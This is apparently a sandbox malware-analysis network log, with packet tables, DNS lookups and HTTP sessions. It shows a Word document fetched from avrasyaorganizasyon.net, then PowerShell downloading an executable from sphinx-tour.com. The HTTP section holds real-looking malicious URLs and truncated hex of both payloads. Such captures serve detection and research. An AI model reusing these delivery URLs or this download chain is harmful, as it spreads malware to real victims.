Nov 27, 2018 14:01:07.128802061 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.128880024 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.128983021 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129020929 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129055977 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129085064 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129126072 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129153013 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129154921 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129183054 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129209995 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129237890 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129264116 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129290104 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129292011 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129317045 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129323006 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129352093 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129380941 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129406929 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129666090 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129702091 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129729033 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129764080 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129781008 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129801035 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129808903 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129838943 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129861116 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129873991 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129901886 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129903078 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.129930973 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.129961014 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.130019903 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130058050 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130089998 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130121946 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130146027 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.130151033 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130181074 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130198002 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.130213976 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130256891 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.130317926 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.130350113 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.130358934 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130392075 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.130424976 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.131587029 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.131669044 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.131711960 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.131766081 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.132098913 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.132168055 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.247200966 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.247270107 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.247343063 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.247368097 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.247389078 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.247412920 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.247420073 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.247464895 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.247910976 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.248265982 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.248306036 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:07.248352051 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.250138044 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:07.250567913 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:12.016848087 CET	80	49209	107.180.48.109	192.168.1.83
Nov 27, 2018 14:01:12.017177105 CET	49209	80	192.168.1.83	107.180.48.109
Nov 27, 2018 14:01:20.166012049 CET	49209	80	192.168.1.83	107.180.48.109

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2018 13:59:39.105878115 CET	54944	53	192.168.1.83	8.8.8.8
Nov 27, 2018 13:59:39.125358105 CET	53	54944	8.8.8.8	192.168.1.83
Nov 27, 2018 13:59:42.865458012 CET	49545	53	192.168.1.83	8.8.8.8
Nov 27, 2018 13:59:42.884984970 CET	53	49545	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:04.910667896 CET	63950	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:04.929493904 CET	53	63950	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:15.102777958 CET	52246	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:15.199184895 CET	53	52246	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:19.411190033 CET	51114	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:19.430835009 CET	53	51114	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:19.742096901 CET	55684	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:19.746854067 CET	61825	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:19.761619091 CET	53	55684	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:19.791261911 CET	53	61825	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:19.997206926 CET	56972	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:20.031719923 CET	53	56972	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:21.861763954 CET	63945	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:21.881103992 CET	53	63945	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:21.922976017 CET	61988	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:21.942410946 CET	53	61988	8.8.8.8	192.168.1.83
Nov 27, 2018 14:00:45.618570089 CET	61340	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:00:45.637542963 CET	53	61340	8.8.8.8	192.168.1.83
Nov 27, 2018 14:01:06.223104000 CET	58816	53	192.168.1.83	8.8.8.8
Nov 27, 2018 14:01:06.257739067 CET	53	58816	8.8.8.8	192.168.1.83

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 27, 2018 14:00:04.910667896 CET	192.168.1.83	8.8.8.8	0x800	Standard query (0)	avrasyaorganizasyon.net	A (IP address)	IN (0x0001)
Nov 27, 2018 14:00:15.102777958 CET	192.168.1.83	8.8.8.8	0x95e2	Standard query (0)	avrasyaorganizasyon.net	A (IP address)	IN (0x0001)
Nov 27, 2018 14:00:19.411190033 CET	192.168.1.83	8.8.8.8	0x55cc	Standard query (0)	avrasyaorganizasyon.net	A (IP address)	IN (0x0001)
Nov 27, 2018 14:01:06.223104000 CET	192.168.1.83	8.8.8.8	0xe5f9	Standard query (0)	sphinx-tour.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 27, 2018 14:00:04.929493904 CET	8.8.8.8	192.168.1.83	0x800	No error (0)	avrasyaorganizasyon.net		89.19.30.15	A (IP address)	IN (0x0001)
Nov 27, 2018 14:00:15.199184895 CET	8.8.8.8	192.168.1.83	0x95e2	No error (0)	avrasyaorganizasyon.net		89.19.30.15	A (IP address)	IN (0x0001)
Nov 27, 2018 14:00:19.430835009 CET	8.8.8.8	192.168.1.83	0x55cc	No error (0)	avrasyaorganizasyon.net		89.19.30.15	A (IP address)	IN (0x0001)
Nov 27, 2018 14:00:45.637542963 CET	8.8.8.8	192.168.1.83	0x4523	No error (0)	ie9comview.vo.msecnd.net	cs9.wpc.v0cdn.net		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2018 14:01:06.257739067 CET	8.8.8.8	192.168.1.83	0xe5f9	No error (0)	sphinx-tour.com		107.180.48.109	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

avrasyaorganizasyon.net

sphinx-tour.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.83	49201	89.19.30.15	80	C:\Program Files\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 27, 2018 14:00:19.616616964 CET	13	OUT	GET /5087642DQPJSQC/BIZ/US HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: avrasyaorganizasyon.net Connection: Keep-Alive
Nov 27, 2018 14:00:19.676536083 CET	14	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html Content-Length: 1147 Date: Tue, 27 Nov 2018 13:00:19 GMT Accept-Ranges: bytes Server: LiteSpeed Location: http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US/ Connection: Keep-Alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f Data Ascii: <!DOCTYPE html><html style="height:100%"><head><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:bo
Nov 27, 2018 14:00:19.676552057 CET	14	IN	Data Raw: 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 Data Ascii: th;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-pag
Nov 27, 2018 14:00:19.685821056 CET	15	IN	Data Raw: 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 Data Ascii: th;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-pag
Nov 27, 2018 14:00:20.389978886 CET	16	OUT	GET /5087642DQPJSQC/BIZ/US/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: avrasyaorganizasyon.net Connection: Keep-Alive
Nov 27, 2018 14:00:20.474472046 CET	17	IN	HTTP/1.1 200 OK Expires: Tue, 01 Jan 1970 00:00:00 GMT Last-Modified: Tue, 27 Nov 2018 13:00:20 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/msword Content-Disposition: attachment; filename="PAYMENT #223848OEIWWWS.doc" Content-Transfer-Encoding: binary Date: Tue, 27 Nov 2018 13:00:20 GMT Accept-Ranges: bytes Server: LiteSpeed Connection: Keep-Alive Vary: Accept-Encoding Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 46 30 30 20 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 58 09 58 93 c7 d6 9e b0 86 b0 23 20 20 48 58 43 10 12 d9 04 59 8b 16 59 2c 9b 20 88 52 14 c2 07 04 c8 42 12 08 11 10 2b 8a 15 5c d9 b4 60 41 a1 b8 54 10 a8 a2 02 2a 15 14 b7 2a 2e 20 2a b5 1a b5 0a 5a 20 b1 88 6c 92 3b 1f 90 5b cb d5 a7 ed bd fd 9f ff ff ef e3 9b bc 73 66 39 73 e6 9c 39 93 65 be 1b ed aa 8f f6 d7 e9 f0 c1 0c b8 02 49 30 21 92 03 32 e2 0e 08 09 c8 d8 e9 3a 50 01 20 1e 0a 0c e4 84 48 24 42 bb 62 20 d7 43 c2 e6 47 fc 3f c1 2f 95 e7 c0 e7 40 4e 0a 80 61 b5 66 34 89 93 99 85 c0 02 60 2e 0f 80 12 88 8a 8f 8a ef 32 eb 32 9b ec fd 1d e4 a4 34 01 09 6a d7 2f 12 22 28 95 c5 03 33 a0 23 39 25 45 a2 df 34 3e 54 17 e3 e4 64 f9 4c 76 52 4c ca 79 9a 53 75 b1 4c 7b 8f 54 9f aa 4e 02 8d 0e 95 3b a6 c7 df 27 15 a0 2c 99 96 e2 7e 0d 43 00 be 85 c7 fa e0 74 fb 8f e4 2c fd f7 cb 01 3c d4 81 b2 c8 60 aa fd 67 a4 31 94 cd 46 00 9c 80 1f b5 64 53 98 01 d8 6e 84 fd 1a 53 2a bf 83 38 6e f1 7a 33 21 9c 0b 00 0c e5 83 fe a1 76 df c5 cc fd 15 c7 27 06 da f6 81 a7 a2 1d ce 43 87 4a f0 53 fd 33 25 6a 3f 11 33 65 c7 01 b6 c5 76 c4 fe 8a db e8 fe bc 0b f1 fc bf 8a 77 f7 fb 5d cc b4 27 6e 53 e0 fa 5a 53 d5 ff 08 62 7b e2 78 c4 e7 6d 8d d7 9e bd 5e d9 1d 70 07 a6 20 ee cf c4 03 Data Ascii: F00 XX# HXCYY, RB+\`AT*. Z l;[sf9s9eI0!2:P H$Bb CG?/@Naf4`.224j/"(3#9%E4>TdLvRLySuL{TN;',~Ct,<`g1FdSnS*8nz3!v'CJS3%j?3evw]'nSZSb{xm^p
Nov 27, 2018 14:00:20.474504948 CET	18	IN	Data Raw: a0 0b e5 4c bf ba f1 53 e7 f6 67 b8 af f3 a1 44 cf 1f 0a b1 5e 19 3c 07 28 3e d4 fe bb 20 b6 2b 86 38 5f e8 3a 9f 40 39 f3 fc 88 d7 9f d9 ff 47 98 a9 2f 96 e2 f3 38 f3 5c 7e 08 7f 36 fe 0f ad 27 de e7 0f 8d 8b a5 18 e2 3c ce 94 62 7c 68 fc 7f 4a Data Ascii: LSgD^<(> +8_:@9G/8\~6'<b\|hJG(C<K5X("8M"1<6*;c53whK$KG3p6Ah6Z4IEddoPb<9p~.p###-dd$D"('u1F(
Nov 27, 2018 14:00:20.474524021 CET	19	IN	Data Raw: cc 77 52 38 01 6a 01 83 fe f7 87 bf 11 14 20 2f 40 9f 00 48 b9 a3 47 cd 0d 16 32 a0 19 96 2a 40 04 4b 2c 58 df 8a de 7b 9b a1 7d 09 10 00 a8 50 9f 03 92 01 0b 20 00 0f ac e1 c8 2c 60 28 94 81 f2 5b d4 03 65 38 4f 30 7d a9 58 bf 0c c8 0a a4 a1 e7 Data Ascii: wR8j /@HG2@K,X{}P ,`([e8O0}XUis.Jz\|[79u?T5WDOpPY`0=R1N>}@I{P@UVAounH`0{(d$eedeQbXVV+@))+(u:XY, bA
Nov 27, 2018 14:00:20.474545956 CET	20	IN	Data Raw: 03 f6 d6 df 53 3e ba 7a f7 90 59 55 dd c4 1c 8f 34 6e ab 08 0c ee 18 26 6c 2b 1b 8b 90 cd 7c 6b 14 3f 4e 15 74 56 85 8c 6a d4 ec d6 a5 ee 29 10 ec 4b d6 7b 29 b4 c8 73 e8 b7 ac d9 92 1d b9 65 2f f1 56 61 81 41 dc c1 94 37 99 46 a3 47 72 2a 0b 53 Data Ascii: S>zYU4n&l+\|k?NtVj)K{)se/VaA7FGr*SyYw^"F)vY>dNQo2JwKBnWZt9xj5Y$]%,O{5suidCGUZ&K4sc9N;#7W!zKjX
Nov 27, 2018 14:00:20.533267975 CET	21	IN	Data Raw: 0c d9 89 76 95 d4 83 43 91 c3 db 84 73 5d 52 3c 36 7f 3f 7a 5a 87 75 6f c4 21 77 99 67 9e 49 d8 aa 52 b7 3b 12 0e 4f 34 6e a7 1b bf dd c5 19 1b d8 58 d4 ac 72 d6 38 f5 ca 43 fe 40 56 32 c1 aa 77 4d eb 50 6e 5f 90 f6 48 c5 0e 37 ce 93 ed 8a 19 1d Data Ascii: vCs]R<6?zZuo!wgIR;O4nXr8C@V2wMPn_H76WVtNY:JpIqBEL-F5\|NU}_&<m3z\|+V?ADvL9gp^~@eqnFy&i-qy4;^6zrh1>
Nov 27, 2018 14:00:20.533298016 CET	22	IN	Data Raw: 39 36 39 33 0d 0a b0 f7 1f 60 51 6c 5d bb 28 5a 24 45 b2 e4 0c 22 49 a2 4a ce 22 02 02 12 45 72 50 01 49 92 73 36 01 4a 94 ac 44 25 a7 06 95 9c 25 0b 08 48 56 72 93 33 4d 6e 89 b7 aa c1 b5 5c eb ff be 7f 7f ff de e7 9e 7b 9e 7b d6 f0 79 bb de 9e Data Ascii: 9693`Ql](Z$E"IJ"ErPIs6JD%%HVr3Mn\{{y5kQobZU~1~Gv]&?xm{Q/&Gwi]5i~4].CNxF5}jUsIF%<Ilt$#+#<&cD[_
Nov 27, 2018 14:00:20.533451080 CET	23	IN	Data Raw: 9f b7 23 db c9 5a 7d 9b a9 b0 11 be 2b 80 a4 d9 e0 bd 1d 5a 50 bc 8e bf a8 0c 3f 72 49 13 4b 50 8e 23 ca 36 57 8f 24 15 d7 40 f7 0c 5d 6c 15 f7 4e 4b bf a2 cc 31 84 f4 73 ad 11 0d e3 1c f0 7b b4 3e dc dd 2c 55 84 b7 1f 22 6a e0 aa 37 1f 28 50 2b Data Ascii: #Z}+ZP?rIKP#6W$@]lNK1s{>,U"j7(P+ qd&s=TrLGFh4^No<3(ZK0{J_wo=Q!td>lw'a2D\|iPyqMFq/9jW{'=Q7C{
Nov 27, 2018 14:00:20.533485889 CET	24	IN	Data Raw: 70 ac e4 53 60 ed 8d 25 55 b2 8e 43 be a3 77 d5 36 88 47 83 4b 43 0d 92 bc 83 e2 52 58 fd a9 1e 93 1f ed c9 b5 5b 30 ae 7f 90 a8 c3 49 db 90 6f ed f3 d6 d9 18 cf 29 1c b5 dc f7 8d 60 cd 86 d7 b6 3e 60 88 b3 7b 0c 0c e7 3e ff 4e 50 b3 dc 7f 78 ed Data Ascii: pS`%UCw6GKCRX[0Io)`>`{>NPx.g(}ZUv\|[7}\o0PHw/)(d#\|#(+0u&CJMT~QndpVS!//(W8M[1ByOTL^8s:<N\|W
Nov 27, 2018 14:00:20.533492088 CET	25	IN	Data Raw: b7 11 58 e8 bb b3 d7 a1 8a bc b2 d7 72 60 87 e3 67 7a 02 34 e8 5a 35 d9 f3 1a ab 86 16 0a 9e 00 75 21 e6 13 54 85 0c 1b 85 4d eb 64 de 2a b5 5e e1 24 ee 09 46 43 99 8f e7 57 dd c2 da c2 6f d4 b9 d1 7f cf 97 cc 3b ee c4 74 38 f2 e1 ec ac 9f d1 75 Data Ascii: Xr`gz4Z5u!TMd^$FCWo;t8u%V)~8c&D=bdAyu~v`R_kF/agAkoxZVs>]_Dn-._Zx\|6n_Fx&t+coP{?:Q=RER[~@]^

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.83	49209	107.180.48.109	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Nov 27, 2018 14:01:06.432883978 CET	109	OUT	GET /my1fugwV HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: sphinx-tour.com Connection: Keep-Alive
Nov 27, 2018 14:01:06.553786993 CET	109	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 27 Nov 2018 13:01:06 GMT Server: Apache Location: http://sphinx-tour.com/my1fugwV/ Content-Length: 240 Keep-Alive: timeout=5 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 68 69 6e 78 2d 74 6f 75 72 2e 63 6f 6d 2f 6d 79 31 66 75 67 77 56 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://sphinx-tour.com/my1fugwV/">here</a>.</p></body></html>
Nov 27, 2018 14:01:06.571428061 CET	110	OUT	GET /my1fugwV/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: sphinx-tour.com Connection: Keep-Alive
Nov 27, 2018 14:01:06.767497063 CET	111	IN	HTTP/1.1 200 OK Date: Tue, 27 Nov 2018 13:01:06 GMT Server: Apache X-Powered-By: PHP/7.1.18 Expires: Tue, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache Content-Disposition: attachment; filename="89913907.exe" Content-Transfer-Encoding: binary Last-Modified: Tue, 27 Nov 2018 13:01:06 GMT Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Keep-Alive: timeout=5 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 07 54 14 4d ff 2e 8a 0e 49 c9 19 15 04 44 82 a0 92 41 05 41 89 43 92 9c 25 e7 9c 19 40 32 48 1c 06 10 c9 51 40 a2 60 00 41 45 24 4b 12 10 90 1c 25 4b 54 a2 80 c4 5b 3d f3 fa 7e ef b7 ff df 7f 9f bd ef ba eb ec 73 d7 b1 96 d3 cc f4 74 f7 53 f5 d4 2f 3c 55 5d 3d 2a e9 c5 c1 70 60 30 18 2e 78 9d 9e c2 60 55 30 4c 11 87 fd 5f 97 1a f0 22 bd 54 4d 0a ab 24 f8 7c b9 0a 4b f1 f3 65 4d 1b 5b 77 26 17 37 67 6b 37 53 47 26 73 53 27 27 67 04 93 99 25 93 9b 87 13 93 ad 13 93 b4 8a 06 93 a3 b3 85 25 37 09 09 21 eb 5f d7 38 88 8d c4 a9 5b ff a6 fa fb e5 50 39 ab a6 3e 5f a5 aa f8 76 51 2d a7 16 a1 fa 25 cd 47 55 dd d6 dc 06 fa ee 7f c4 57 85 c3 60 8a 58 f8 30 39 b1 45 ee df fb a6 61 38 58 44 58 24 30 18 d3 bf 8e fb 41 03 36 e4 e0 c5 fb 57 cb c8 31 9f f1 60 58 e8 ef 71 7f 1f 18 87 8d de 6f 9b 7e ed 23 f6 ef 03 a1 63 